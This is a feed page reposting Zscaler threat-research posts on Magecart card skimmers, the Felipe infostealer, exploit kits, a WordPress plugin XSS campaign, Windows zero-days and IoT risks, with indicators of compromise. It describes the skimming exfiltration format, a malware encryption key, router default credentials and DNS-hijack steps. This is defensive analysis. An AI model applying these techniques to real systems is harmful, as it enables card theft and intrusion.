fiattt(.)blob(.)core(.)windows(.)net fukshawefwe22(.)blob(.)core(.)windows(.)net gry1asdqw1(.)blob(.)core(.)windows(.)net hsdv(.)blob(.)core(.)windows(.)net parmalat7(.)blob(.)core(.)windows(.)net funksha1(.)blob(.)core(.)windows(.)net
Categorías: Security Posts

Magecart activity and campaign enhancements

Zscaler Research - Hace 1 hora 14 mins
Magecart is a hacker group known for skimming credit or debit card details by injecting malicious JavaScript code into e-commerce sites. Back in September 2018, the Zscaler ThreatLabZ research team published a blog on Magecart activity that analyzed its attack methods and evasion tactics. We are now following up on that blog to report on recent activity we’ve seen and some enhancements in the campaign.   Magecart attack chain In the recent campaign, we noticed a change in the attack chain. One example is the use of heavily obfuscated JavaScript with encrypted data. Also, in some cases, the malicious JavaScript code is now being injected directly in the compromised e-commerce sites, whereas in earlier attacks, the malicious code was injected remotely. Fig 1: Hits of compromised websites in the last three months   1. Injecting heavily obfuscated malicious JavaScript dynamically The below credit card stealer JavaScript payload is dynamically loaded when the victim presses the checkout button after loading the cart. Fig 2: Heavily obfuscated malicious JavaScript code injected on the checkout page   The ThreatLabZ team’s smart crawler with heuristic detection shows that various JavaScript functions are obfuscated in the payload. Fig 3: Crawler’s heuristic detection Fig 4: Malicious script after three levels of deobfuscation by the crawler.   Analysis of the skimming toolkit The above discussed malicious script looks for the keywords “onepage|checkout|onestep|firecheckout” in the URL and, if found, injects another script from hxxps://dnsden[.]biz/a.js. Fig 5: Script injected from hxxps://dnsden[.]biz   The above injected obfuscated script hxxps://dnsden[.]biz/a.js contains encrypted data which is decrypted by the RC4 algorithm in the runtime.   Fig 6: Use of RC4 algorithm in ‘a.js’   The encrypted data in ‘a.js’ script after RC4 decryption ends up injecting the main skimming script, which is responsible for extracting and sending the victim's credit card details back to the attacker. Encrypted data - w5rDvcOKwrnCnsKYcWHCgAcaUsOFVcOQXnZpw48KfjZ/CMObMMOiwq7Cm1XDvFDCl8KBEsKRE8Oyw6krWcK0wo1Xw7J+w6/DknoJasKVScKZOhzCoRI= Decrypted data - The ‘universal.js’ is also obfuscated and has the same encryption algorithm as ‘a.js’. After decryption, it calls a function on the form change event and collects all the payment info entered by the victim. Fig 7: Collecting payment card details Fig 8: Sends victim’s credit card details to C&C   Fig 9: POST request with the stolen credit card details   info=Base64(stolen_data)&hostname=compromised_site&key=random_key Stolen data includes billing and payment details. Fig 10: Decoded stolen data   2. Injecting malicious JavaScript directly in the compromised site   Fig 11: Malicious JavaScript code hosted on the compromised e-commerce site is injected   Fig 12: Malicious JavaScript code hosted on a compromised site for skimming payment card details   Analysis of the skimming toolkit The malicious JavaScript code first checks for the two cookie names “$s” and “$sent”; if these cookies are set, data is stored into variable after decoding. These cookie values are referred to each time any payment card details are being entered, and values are updated if the payment card details are new. Fig 13: Getting values from the two cookie names “$s” and “$sent”   To get payment card details, data from all the tags, such as input, select, and text area, are stored and the script undergoes a basic length check on the card details. Fig 14: Validating length of payment card details   After validating payment card details, a hash of the card details is calculated and checked to determine if the same hash value is available in the data retrieved from the cookie “$sent” earlier. Payment details are dropped if any hash match is found. Fig 15: Checking the hash value of card details against data retrieved earlier from the cookie   Each time any new payment card details are entered, the details are sent to the attacker and the hash value for these details is appended to the cookie value “$sent”;  this cookie value is used to check if the details being entered are new. Fig 16: Value of the cookie “$sent” stored in the victim's browser   On decoding the above Base64 encoded value of the cookie “$sent,” we get the MD5 array of the payment card details. By storing the encrypted payment card details as a cookie, the attacker has added the ability to drop duplicate details being sent to the attacker, as payment details are always checked against the cookie value and only unique card details are sent to the attacker. After all the above checks are encoded, the payment card details are sent to the attacker-controlled site. Fig 17: GET request with the stolen information   In a similar skimming toolkit, along with the above-discussed cookie logic, attackers are injecting fake payment card fields into the compromised site and hiding legitimate fields once the victim selects credit card as the payment method. Fig 18: Fake credit card details field and malicious JavaScript file   Fig 19: HTML code for the fake credit card details fields in the malicious script   Fig 20: Malicious script injecting the fake credit card details fields   Fig 21: Above, injected credit card fields; below, legitimate credit card fields   The injected and legitimate credit card fields look similar, but from the HTML input field attributes (ID and type), there are noticeable differences. In the injected fields, the card number ID is "_ccnumber" and the type is "text," while in a legitimate card number, the ID is "credit-card-number" and the type is "tel."   IOCs dnsden[.]biz jquery-bin[.]com/gate[.]php lumbertrans[.]com/errors/default/gate[.]php luxbagsgirl[.]com/errors/default/gate[.]php jsreload[.]pw/gate[.]php saterday-race[.]com/gate[.]php jqueryextd[.]at/gate[.]php routingzen[.]com/gate[.]php mz-at-shop[.]de/errors/default/gate[.]php 93[.]187[.]129[.]249/gate[.]php developer-js[.]info/gate[.]php google-anaiytic[.]com/fonts[.]googleapis/gate[.]php magento-analytics[.]com/gate[.]php gtows[.]com   Compromised sites shop.triggerbrothers[.]com[.]au custommagnetsdirect[.]com lumbertrans[.]com sunbuggy[.]com saterday-race[.]com windblox[.]com cakedecoratingsolutions[.]com[.]au network-ed[.]com[.]au adooq[.]com mz-at-shop[.]des reddotarms[.]com sprucela[.]com/ t[.]cltradingfl[.]com worldcraftindustries[.]com reallifecatholic[.]com wbminternational[.]com whistlerrides[.]ca/ smartsilk[.]com/ classictruckglass[.]com oconnellsclothing[.]com/skin/ purefruittechnologies[.]com/ cornerstone-arch[.]com minitruckusa[.]com magformers[.]com ravishingcosmetics[.]com alamoshoes[.]com/ salonsavings[.]com/ bathroompanelsuperstore[.]com britishfitness[.]com bumperworksonline[.]com niftyconcept[.]com cornerstone-arch[.]com decorprice[.]com   Conclusion These new developments in an ongoing campaign illustrate some of the ways that attackers are continuously enhancing their methods for stealing sensitive information like login credentials, bank or payment card details, personally identifiable information, and so on. The Magecart campaign has been active for a long time and continues to evolve and hone its techniques to get better at stealing payment card information and related data.  Zscaler ThreatLabZ actively tracks such campaigns and protects customers from these types of attacks.  
Categorías: Security Posts

Felipe, a new infostealer Trojan

Zscaler Research - Hace 1 hora 14 mins
The Zscaler ThreatLabZ team came across a new strain of infostealer Trojan called Felipe, which silently installs itself onto a user’s system and connects to a command-and-control (C&C) server to send system information from the compromised system. This malware is compiled for both 32-bit and 64-bit Windows operating systems. Felipe basically steals the victim's debit and credit card information and sends it, along with other personal information, to the remote C&C server. It also sets a date and time to perform other malicious activity upon successful infection of the victim machine. The files dropped by malware include: Win XP: %UserProfile%\Local Settings\Temp\vshost.exe %UserProfile%\Local Settings\Temp\explorer32.exe %UserProfile%\Local Settings\Temp\install2.bat %UserProfile%\Local Settings\Temp\infect.txt Win7/Win10: %UserProfile%\AppData\Local\Temp\vshost.exe %UserProfile%\AppData\Local\Temp\explorer32.exe %UserProfile%\AppData\Local\Temp\install2.bat %UserProfile%\AppData\Local\Temp\infect.txt The Felipe Trojan enumerates the system and tries to determine whether it has already been infected by checking the files vshost32.exe and vshost64.exe in the compromised system. The parent file downloads its payloads to %UserProfile%\AppData\Local\Temp\update2804. If this folder already exists, the malware deletes the folder and files inside. Once the folder is deleted, the malware will create a new folder with the same name in hidden mode.   When the update2804 folder is created, the malware downloads its different payloads within a gap of just 50 milliseconds. After downloading the payload, the malware copies it to a special directory temp folder in the system in hidden mode and executes it. First, it will execute the install2.bat file and then it will execute vshost.exe. Below is the code of install2.bat: The batch file will perform registry changes responsible for the following: Run entries for vshost.exe, exolorer32.exe to ensure persistence Disable Windows Defender Bypass UAC control Excluding path of temp folder in Windows Defender Vshost.exe checks the victim's bank cards by checking a card's length or the starting numbers of cards, such as: American Express card: number should begin from 34 or 37 Visa: card length between 13 or 16 Mastercard: card length to be 16 Discover: card length to be 16 and begin from 6011 or 65 Below is a snapshot of some of these instructions: The following is the algorithm to check the card's validity: Process digits from right to left. Double the alternate digit starting from first. Break the alternative digits if addition is greater than 10 (e.g., 28 = 2 + 8 (10) or 19 = 1 + 9 (10)). Return the 10's complement of the total. Finally, it verifies the checksum digit. It will be invalid if the checksum is not modular 10. Snapshot of the algorithm:   If the system is already infected, the malware looks for the filename infect.txt in the temp folder. If it is already there, it sends the below data; otherwise, it sends a request to the C&C to further download the file infect.text. It also sends the victim's system information and writes “infect” in the infect.txt file. The Felipe Trojan gets a memory dump of processes by checking the memory addresses that can store data. Basically, it scans the process memory and, whenever a process starts, the system allocates enough memory for its heap, stack, and regions. However, Windows won't allocate an "entire block" of memory; it tries to allocate any free memory available for the User-Mode. The following are the methods used for the memory dump: GetSystemInfo() Retrieves random information about the system in a structure called SYSTEM_INFO. This structure also contains two variables: minimumApplicationAddress & maximumApplicationAddress, which store the minimum and the maximum address where the system can allocate memory for User-Mode applications. VirtualQueryEx() This method gets information about a range of memory addresses and returns it into a structure named MEMORY_BASIC_INFORMATION. It tells us the range of a memory chunk that starts from the specified address. ReadProcessMemory() Used to read a number of bytes starting from a specific memory address. OpenProcess() Returns a handle to a specific process; the process must be opened. WriteProcessMemory() Writes data to an area of memory in a specified process. After the memory dump, the malware tries to find the victim's used bank card from memory, and fetches this information to send to the C&C. Below is a snapshot of it: Encryption method for sending data to C&C: The malware uses Triple Data Encryption Standard (3DES) algorithm. The first step is to create a simple wrapper class that encapsulates the 3DES algorithm and stores the encrypted data as a base-64 encoded string. Then, that wrapper is used to securely store private user data in a publicly accessible text file.  The 3DES algorithm provides two-way encryption. It needs the private key string as the wrapper to generate a unique decrypted string. Here, the malware uses "L%f@Y7Boolean4%()F$y" as a private key. For more info: https://docs.microsoft.com/en-us/dotnet/visual-basic/programming-guide/language-features/strings/walkthrough-encrypting-and-decrypting-strings   Sending data to the C&C:   The malware uses the free “geoPlugin” web service to determine the victim's system and location information. The following are the services used by the malware from the geoPlugin web service: System IP City Region code Country name Timer Set: The malware sets the time in the program to shut down the system and restart on a specific day. In this example, the time should be between 5:06 a.m. and 6:09 a.m. on Friday, then the system gets shut down. The command to shutdown is: Interaction.Shell("shutdown /r /t 0", AppWinStyle.MinimizedFocus, false, -1); Switches: /r: shut down and then restart the local computer /t: time, in seconds, between the execution of the shutdown command and the actual shutdown or restart AppWinStyle.MinimizedFocus: starts the program minimized and with focus   After the restart, the malware fetches hardware information from the victim's system, including the serial number and running processes. If the “explorer32.exe” process is not found in the running processes, the malware downloads from the C&C and executes it from the temp folder for performing further malicious activities. It uses the GetAsyncKeyState() Win API to query the state of each key on the keyboard. From the return value of GetAsyncKeyState(), it can be determined whether the key is up or down at the time the function is called.   Network communication:   Indicators of Compromise: Filename Md5 vshost.exe 15CE8F849FFF4CC8675900EC838A93F9 down.exe 61B06E49D514F3DC5BE4F4EF08F6B43C explorer32.exe D912771C8CD5720AD835E08EB80A77B6 install2.bat 7D016A3BB29904A6E00161694FC6AB4E Download URLs: 192.99.215[.]95/uploads Inmemory[.]tech
Categorías: Security Posts

Top exploit kit activity roundup – Spring 2019

Zscaler Research - Hace 1 hora 14 mins
This is the tenth in a series of quarterly roundups by the Zscaler ThreatLabZ research team in which we collect and analyze the activity of the top exploit kits over the last three months. Exploit kits (EKs) are rapidly deployable software packages designed to leverage vulnerabilities in web browsers and deliver a malicious payload to a victim’s computer. Authors of EKs offer their services for a fee, distributing malware for other malicious actors. What follows are highlights from the EK activity we observed during the last quarter.   RIG EK Rig EK has continued to be active through the quarter. Though EK activity has declined overall, RIG EK activity has been persistent. We saw no changes in the kit behavior as compared to the previous quarter. Below we can see the hits for RIG EK activity. Figure 1: RIG EK hits from 1 March 2019 to 20 May 2019. The geographical distribution of RIG EK hits is shown below. Figure 2: RIG EK heat map showing infection regions One instance of RIG EK activity can be seen below. Figure 3: RIG EK infection cycle The obfuscated JavaScript on the landing page is shown below. Figure 4: RIG EK Landing page Obfuscated JavaScript. We observed the use of two malicious scripts on the landing page, the first one being CVE-2016-0189, which is a Scripting Engine Memory Corruption Vulnerability targeting IE 11 and below. The second script was CVE-2018-8174, which is a Windows VBScript Engine Remote Code Execution vulnerability targeting Windows 10, 7, and 8.1, and Windows Server 2008, 2012, and 2016. We also saw the use of Adobe Flash exploit CVE-2018-4878, which is a use-after-free vulnerability in Adobe Flash Player version 28.0.0.161 and earlier. The snippet of code targeting the CVE-2018-4878 vulnerability can be seen in the decompiled flash file below. Figure 5: Decompiled Flash exploit in RIG EK cycle; CVE-2018-4878 The malware payloads seen with RIG EK this quarter belonged to the SmokeLoader and AZORult families.   Underminer EK Underminer EK is relatively new and we started seeing activity for this EK over the past six months. We see this exploit kit serving its payloads over custom HTTP ports. The recent hits for Underminer EK are shown below. Figure 6: Underminer EK Hits from 1 March 2019 to 20 May 2019.   The geographical distribution of Underminer EK hits is shown below. Figure 7: Underminer EK heat map showing infection regions.   An infection cycle for Underminer EK is shown below. Figure 8: Underminer EK infection cycle   The majority of the activity that we have seen for Underminer EK starts with a malvertising campaign involving a popcash[.]net URL that redirects users to a malicious domain, adpop[.]live. The malicious domain serves content over HTTPS which further redirects the user to the Underminer EK landing page. The call for the Underminer EK on the malicious domain adpop[.]live is shown below. Figure 9: Underminer EK landing page call on malvertisement page   This landing page contains a call to the malicious SWF payload. This call can be seen in the screenshot below. Figure 10: Underminer EK call for Flash exploit   The malware payload seen in this cycle was a bootkit Trojan.   Spelevo EK We started seeing activity for a new exploit lit called Spelevo in March 2019. Spelevo EK authors integrated the relatively new Flash Exploit CVE-2018-15982. The hits for Spelevo EK activity are shown below. Figure 11: Spelevo EK Hits from 1 March 2019 to 20 May 2019   The geographical distribution of Spelevo EK hits is shown below. Figure 12: Spelevo EK heat map showing infection regions   An infection cycle for Spelevo EK is shown below. Figure 13: Spelevo EK infection cycle   The image below shows the Spelevo EK malvertisement redirect to the EK landing page. Figure 14: Spelevo EK malvertisement redirect   Spelevo EK landing page contains an obfuscated JavaScript Browser Plugin Detect script to determine the Adobe Flash player version that the user's system is running. The obfuscated JavaScript along with the decoded script is shown in the image below. Figure 15:  Spelevo EK landing page and deobfuscated browser plugin detect JavaScript   The same page serves a redirect URL based on the conditions met. Figure 16: Spelevo EK Flash Player plugin detect   Once the Adobe Flash version is found to be vulnerable, the user is served a malicious SWF file which is a use-after-free vulnerability (CVE-2018-15982) in Adobe Flash Player versions 31.0.0.153 and earlier. The cycle did not serve any malware payload on our test machine but malware activity have been reported on successful exploitation in the wild.   Other exploit kits We also observed some exploit kit activities directed towards routers and focused on hijacking DNS queries. A snippet of scan code served by a router exploit kit is shown below. Figure 17: Scan script served by a router exploit kit   Based on the target IP addresses seen online, the script then calls another obfuscated malicious JavaScript; a sample script served by such an exploit kit can be seen below. Figure 18: Obfuscated JavaScript on a router exploit kit landing page   A Base64 decoded version of the landing page shows the DNS hijacking script below. In this screenshot we see the script trying to target the gateway IP with default credentials. In this case, the script is attempting to log in with user name "admin" and an empty password. If the attempt is successful, the DNS address is modified to the attacker's DNS address (158.255.7[.]150) along with a backup legitimate public DNS address (8.8.4[.]4). Figure 19: Base64 decoded JavaScript showing the DNS hijacking configuration   Another instance of a default credential being used to target routers is shown below. Figure 20: Default credentials being targeted by router exploit kits   Here we see password "gvt12345" being used along with the username "admin." A quick Google search for this password pattern reveals that this might have been used as default password by a few Brazilian ISPs and has been used before in similar attacks. Checking the name resolution using the attacker's DNS server shows the DNS redirect behavior in action, as shown below. Figure 21:  DNS resolution using the attacker’s DNS server shows name resolution to a phishing IP   In this case, the server IP resolved by the DNS server for www.google[.]com is a malicious server that is controlled by the attacker and used to serve phishing content to victims. GrandSoft EK, Magnitude EK, and Fallout EK did not show changes during the quarter. We did not see activity this quarter for other recent exploit kits such as Terror EK, KaiXin EK, and Disdain EK.   Conclusion This quarter we saw the addition of Spelevo and Underminer to the exploit kit threat landscape, and we saw some EK activity targeting routers. Exploit kits are effective, as they can infect a victim's machine during web browsing without the user's knowledge. The attackers monetize the successful infections in a variety of ways, such as by collecting a ransom for retrieving data encrypted by ransomware, mining cryptocurrencies using the victim's system resources, or installing banking Trojans to steal a victim's identity. Attackers frequently change their techniques by obfuscating the source code or integrating new exploit codes into their EKs, and security researchers analyze and block the new threats by tracking changes in the EK behavior.   To help avoid infections from exploit kits, users should always block untrusted third-party scripts and resources, and avoid clicking on suspicious advertisements. Keeping browser plugins and web browsers up to date with the latest patches helps to protect against common vulnerabilities targeted by exploit kits. The Zscaler ThreatLabZ research team has confirmed coverage for these top exploit kits and subsequent payloads, ensuring protection for organizations using the Zscaler cloud security platform.  
Categorías: Security Posts

Malicious JavaScript injected into WordPress sites using the latest plugin vulnerability

Zscaler Research - Hace 1 hora 14 mins
WordPress is by far the most popular content management system (CMS) and, because of its wide usage, it is also popular among cybercriminals. Most of the WordPress sites that have been compromised are the result of attackers exploiting vulnerable versions of the plugins used. A stored cross-site script vulnerability was discovered last week in the popular WordPress Live Chat Support plugin. The vulnerability allows an unauthenticated attacker to update the plugin settings by calling an unprotected "admin_init hook" and injecting malicious JavaScript code everywhere on the site where Live Chat Support appears. All versions of this plugin prior to version 8.0.27 are vulnerable. The patched version for this vulnerability was released on May 16, 2019,  and has been fixed for version 8.0.27 and higher. ThreatLabZ researchers recently discovered what may be the first campaign in which attackers are exploiting the Live Chat Support plugin vulnerability and injecting a malicious script that is responsible for malicious redirection, pushing unwanted pop-ups and fake subscriptions. While it is not yet seen as a widespread attack, the number of compromised websites is growing (at the end of this blog there is a link to the names of the compromised sites). Fig 1: Hits of the compromised WordPress sites Fig 2: WordPress site using a vulnerable version of the Live Chat Support plugin   Fig 3: Obfuscated script injected in the compromised WordPress site   Fig 4: Deobfuscated version of the injected script   The injected script sends a request to the URL hxxps://blackawardago[.]com to execute the main script. Fig 5: Request and response to the hxxps://blackawardago[.]com   After the execution of the above script, the victim is redirected to multiple URLs, mainly related to pushing unwanted popup ads and fake error messages. Fig 6: Highlighted (red) multiple redirected URLs after the execution of the malicious script.   Fig 7: Popups after execution of the malicious script   The domain that hosts the malicious script is a newly created domain hosted on a dedicated IP address. Fig 8: Whois information of the domain   Conclusion Cybercriminals actively look for new vulnerabilities in popular content management systems such as WordPress and Drupal, as well as popular the plugins that are found in many websites. An unpatched vulnerability in either the CMS or associated plugins provides an entry point for attackers to compromise the website by injecting malicious code and impacting the unsuspecting users visiting these sites. It is critical for website owners to apply the security update if they are using the vulnerable plugin, particularly because it is a pre-auth vulnerability and can lead to widespread compromise. The Zscaler ThreatLabZ team is actively tracking and reviewing all such malicious campaigns to ensure that our customers are protected.   IOCs blackawardago[.]com 216[.]10[.]243[.]93 List of compromised sites is available here.
Categorías: Security Posts

Microsoft vulnerability: Source code published for three zero-day vulnerabilities in Windows

Zscaler Research - Hace 1 hora 14 mins
Background A security researcher (with the pseudonym SandboxEscaper) has discovered three zero-day vulnerabilities in Microsoft Windows. Their POC and source code have been released on GitHub. Two of these are local privilege escalation (LPE) vulnerabilities. They have been tested to work on Windows 10 only. The third vulnerability is a sandbox bypass vulnerability in Internet Explorer 11 (IE11). As of this writing, no patch has been released by Microsoft for these vulnerabilities.   What is the issue? The security researcher has published three POCs: angrypolarbearbug2, bearlpe, and sandboxescape.  The first vulnerability – angrypolarbearbug2 – can be exploited by performing specially crafted DACL (discretionary access control list) operations when the Windows Error Reporting service tries to write a DACL for the given Windows Error Reporting (.wer) file. Once successfully exploited, the vulnerability gives SYSTEM privileges to the attacker. The second vulnerability – bearlpe – targets the way the Windows task scheduler service uses the SetJobFileSecurityByName() function to write DACL for the job file. For this exploit to work, one needs to have "schtasks.exe" and "schedsvc.dll" files from Windows XP. Once successfully exploited, the vulnerability gives SYSTEM privileges to the attacker. The third vulnerability – sandboxescape – bypasses the IE11 sandbox and allows an attacker to execute code in IE low protection mode. To exploit this vulnerability, an attacker needs to inject a special DLL in the IE process. According to reports, this exploit cannot be triggered remotely.   What systems are impacted? The POC has been tested on Windows 10 32-bit and 64-bit and IE11.   Zscaler coverage Advanced Threat Signatures: Win32.Exploit.Bearlpe  Win32. Exploit.CVE.2019.0863 Win32.Exploit.Polarbearescape W32/Agent.NBHI Zscaler Cloud Sandbox provides proactive coverage against exploit payloads and advanced threats like ransomware, and the Zscaler ThreatLabZ team is actively monitoring for in-the-wild exploit attempts to ensure coverage.
Categorías: Security Posts

IoT traffic in the enterprise is rising. So are the threats.

Zscaler Research - Hace 1 hora 14 mins
Do you know exactly what IoT devices are on your network and how active they are? You’d better, because they might be opening the door to cybercrime. IoT devices are, of course, nonstandard computing devices that connect wirelessly to a network and have the ability to transmit data. These devices can communicate and interact over the internet, and they can be remotely monitored and controlled. Connected devices are part of a scenario in which every device talks to other related devices in an environment to automate home and industrial tasks, and to communicate usable sensor data to users, businesses and other interested parties. IoT devices are meant to work in concert for people at home, in industry, or in the enterprise. Enterprises around the globe have been adopting the use of IoT products to improve organizational efficiency, enhance communications, and to gain insight into system performance. According to Gartner, 20.4 billion IoT devices will be in use worldwide by 2020, and more than 65 percent of enterprises will adopt IoT products. That translates to quite a bit of budget being dedicated to these devices. IDC has predicted that IoT spending will reach $745 billion in 2019 and surpass the $1 trillion mark in 2022. That’s a 15 percent increase over 2018’s $646 billion. According to the same report, the U.S. and China will be spending the most at $194 billion and $182 billion, respectively. They are followed by Japan, Germany, Korea, France, and the UK.   Analyzing IoT transactions To help organizations get a better understanding of IoT activity in the enterprise, the ThreatLabZ research team analyzed IoT traffic across the Zscaler cloud during a one-month period between March and April 2019. The analysis looked at the types of devices in use, the protocols they used, the locations of the servers with which they communicated, and the frequency of their inbound and outbound communications, as well as IoT traffic patterns. The report, titled IoT in the Enterprise: an analysis of traffic and threats, provides a general overview of the most frequently seen device categories, then takes a deep dive into the transaction data for specific types of IoT devices. It also explores some of the security concerns around IoT devices, including the use of plain-text channels and the threat of malware.   Emerging threats The rapid adoption of these IoT devices has opened up new attack vectors for cybercriminals. And, as is often the case, IoT technology has moved more quickly than the mechanisms available to safeguard these devices and their users. Researchers have already demonstrated remote hacks on pacemakers and cars. And, in October 2016, a large distributed denial-of-service (DDoS) attack, dubbed Mirai, affected DNS servers on the east coast of the United States, disrupting services worldwide. This attack was traced back to hackers infiltrating networks through IoT devices, including wireless routers and connected cameras. In August 2017, the U.S. Senate introduced the IoT Cybersecurity Improvement Act, a bill addressing security issues associated with IoT devices. While it is a start, the bill only requires internet-enabled devices purchased by the federal government to meet minimum requirements, not the industry as a whole. However, it is being viewed as a starting point that, if adopted across the board, could pave the way to better IoT security industry-wide. One of the ThreatLabZ team’s discoveries was that the vast majority of IoT transactions were occurring over plain text channels, instead of the more secure SSL-encrypted channels. While a major security vulnerability, the use of unsecured channels is just one vulnerability with IoT devices. They are notorious for weak, preset passwords that often go unchanged.   Malware in IoT traffic As with just about every device connected to the internet, malware is also a threat to IoT devices. Each quarter, the Zscaler cloud blocks approximately 6,000 transactions from IoT-based malware and exploits. And, earlier this year, the Zscaler ThreatLabZ team analyzed certain threats that were targeting IoT devices. The fact is that there has been almost no security built into the IoT hardware devices that have flooded the market in recent years, and there’s typically no way to easily patch these devices. While many businesses have thought security for IoT devices unnecessary because nothing is stored on the devices, this isn’t the case. The Mirai botnet attack illustrated how exposed companies can be as a result of their IoT devices. Even though these devices continue to be an easy target for cyberattacks, enterprises can take steps to reduce the risk: Change default credentials to something more secure. As employees bring in devices, encourage them to be sure their passwords are strong and their firmware is always up to date. Install IoT devices on isolated networks (to prevent lateral movement), with restrictions on inbound and outbound network traffic. Restrict access to the IoT device as much as possible from external networks. Block unnecessary ports from external access. Apply regular security and firmware updates to IoT devices, in addition to securing the network traffic. Finally, deploy a solution to gain visibility of the shadow IoT devices that are already sitting inside the network and ensure above safeguards.   Advanced security for IoT devices IoT devices have become commonplace in enterprises from all industries and in nearly every corner of the globe. These devices were designed to help improve efficiency and expand communications, and organizations continue to explore new ways to incorporate these devices into everyday operations. Of course, many of the devices are employee-owned, and this is just one of the reasons they are a security concern. With all of these new connected devices, and the enormous amounts of associated data traversing your network and opening up new attack vectors for cybercriminals, can you trust your legacy network to provide adequate security? The security of your enterprise hinges on your answer. Read the entire report, IoT in the Enterprise: an analysis of traffic and threats. I’d like to thank our Sr. Security Researcher Viral Gandhi for his help in compiling the report. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  Deepen Desai is VP of Security Research at Zscaler
Categorías: Security Posts
Distribuir contenido